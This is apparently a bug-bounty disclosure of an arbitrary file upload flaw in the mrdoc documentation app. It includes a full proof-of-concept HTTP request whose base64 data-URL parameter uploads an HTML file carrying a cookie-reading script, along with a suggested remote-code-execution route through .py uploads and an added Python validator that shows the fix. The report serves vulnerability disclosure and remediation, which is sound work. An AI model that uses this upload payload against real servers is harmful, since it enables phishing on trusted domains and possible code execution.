Unrestricted Upload of File with Dangerous Type in zmister2016/mrdoc

Valid

Reported on

Oct 16th 2021


Description

● Arbitrary file upload at /upload_doc_img/
● An attacker could abuse this vulnerability:
  ○ For an HTML file, it could be used for phishing
  ○ For a .py file, it may lead to Remote Code Execution (by overwriting the existing Django .py files; not proved yet)

Proof of Concept

Arbitrary file upload, HTML for instance

POST /upload_doc_img/ HTTP/1.1
Host: mrdoc.zmister.com
Content-Length: 175
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://mrdoc.zmister.com
Referer: http://mrdoc.zmister.com/create_doc/?pid=930
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Hm_lvt_95f55ea1c5936e35e732966bef35e4a5=1634395760; csrftoken=b4FuQm8mnBKS8oZPUlF9HuKamFy7qXCow0jeuGXgcTdFhhYWOrbJf2G5MuxTPj0Z; sessionid=mu3ptwhqzhmqnnmywvi3jpiwzybpx91b; Hm_lpvt_95f55ea1c5936e35e732966bef35e4a5=1634400403
Connection: close

csrfmiddlewaretoken=RXRaq7FYHMjmn0jJynWc6X8WQWXPmQVacTvU4ruSw4M9wTiQstsMEv4RgLWBLcjL&base=data%3Aimage%2Fhtml%3Bbase64%2CPFNDUklQVD5hbGVydChkb2N1bWVudC5jb29raWUpPC9TQ1JJUFQ%2b

Notice the base param, which contains:

data:image/html;base64,PFNDUklQVD5hbGVydChkb2N1bWVudC5jb29raWUpPC9TQ1JJUFQ+

● data:image/ : fixed prefix the endpoint expects
● html : the file type (extension) you want to upload
● ;base64, : fixed separator the endpoint expects
● PFNDUklQVD5hbGVydChkb2N1bWVudC5jb29raWUpPC9TQ1JJUFQ+ : calculated by base64([file_content])

PoC URL:
● HTML: http://mrdoc.zmister.com/media/202110/2021-10-17_011214_240722.html
● Py: http://mrdoc.zmister.com/media/202110/2021-10-17_011207_785587.py

Impact

This vulnerability is capable of:
● Uploading files of any type
  ○ Phishing (abusing the trusted domain)
  ○ May lead to Remote Code Execution (by overwriting the existing Django .py files; not proved yet)

Recommended fix

● Restrict the file type: only allow PNG, JPG and so on
● Fix the Content-Type of the response when serving http://mrdoc.zmister.com/media/*; for example, force it to image/png
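The following is an added example of the first recommended fix applied to the `base` parameter format shown in the Proof of Concept; it is not code from the report or from the mrdoc project. It assumes the endpoint receives the data URL as a string, takes the extension only from a server-side allowlist, and checks the decoded bytes against the magic number of the declared image type; the allowlist, size limit and sample inputs are constructed for this illustration.

```python
import base64
import binascii
import re
import secrets
from typing import Tuple

# Allowlist (assumption): declared subtype -> (extension, magic bytes the content must begin with)
ALLOWED_IMAGE_TYPES = {
    "png": (".png", b"\x89PNG\r\n\x1a\n"),
    "jpeg": (".jpg", b"\xff\xd8\xff"),
    "gif": (".gif", b"GIF8"),
}

# Shape of the parameter from the report: data:image/<subtype>;base64,<payload>
DATA_URL_RE = re.compile(r"^data:image/([a-z0-9.+-]+);base64,(.*)$", re.DOTALL)


class RejectedUpload(ValueError):
    """Raised when the data URL is malformed or not an allowed image."""


def parse_image_data_url(base: str, max_bytes: int = 5 * 1024 * 1024) -> Tuple[str, bytes]:
    """Validate a data-URL image upload and return (safe_filename, content)."""
    m = DATA_URL_RE.match(base.strip())
    if not m:
        raise RejectedUpload("not a base64 image data URL")
    subtype, payload = m.group(1).lower(), m.group(2)
    if subtype not in ALLOWED_IMAGE_TYPES:          # blocks html, py, ...
        raise RejectedUpload(f"image subtype not allowed: {subtype}")
    ext, magic = ALLOWED_IMAGE_TYPES[subtype]
    try:
        content = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise RejectedUpload("invalid base64 payload") from exc
    if len(content) > max_bytes:
        raise RejectedUpload("upload too large")
    if not content.startswith(magic):               # declared type must match the bytes
        raise RejectedUpload("content does not match declared image type")
    # Server-generated name: no user-controlled path or extension reaches the filesystem
    return secrets.token_hex(16) + ext, content


def is_accepted(base: str) -> bool:
    """True if the upload passes validation, False if it is rejected."""
    try:
        parse_image_data_url(base)
        return True
    except RejectedUpload:
        return False


# Constructed sample inputs (not from the report): a minimal PNG header, and a
# declared PNG whose bytes are not an image. REPORT_PAYLOAD is the report's own value.
SAMPLE_PNG = "data:image/png;base64," + base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 8).decode()
SAMPLE_MISMATCH = "data:image/png;base64," + base64.b64encode(b"not an image").decode()
REPORT_PAYLOAD = "data:image/html;base64,PFNDUklQVD5hbGVydChkb2N1bWVudC5jb29raWUpPC9TQ1JJUFQ+"
```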

We have contacted a member of the zmister2016/mrdoc team and are waiting to hear back a month ago
zmister2016 validated this vulnerability a month ago
hi-unc1e has been awarded the disclosure bounty
The fix bounty is now up for grabs
zmister2016 confirmed that a fix has been merged on dcb4fc a month ago
zmister2016 has been awarded the fix bounty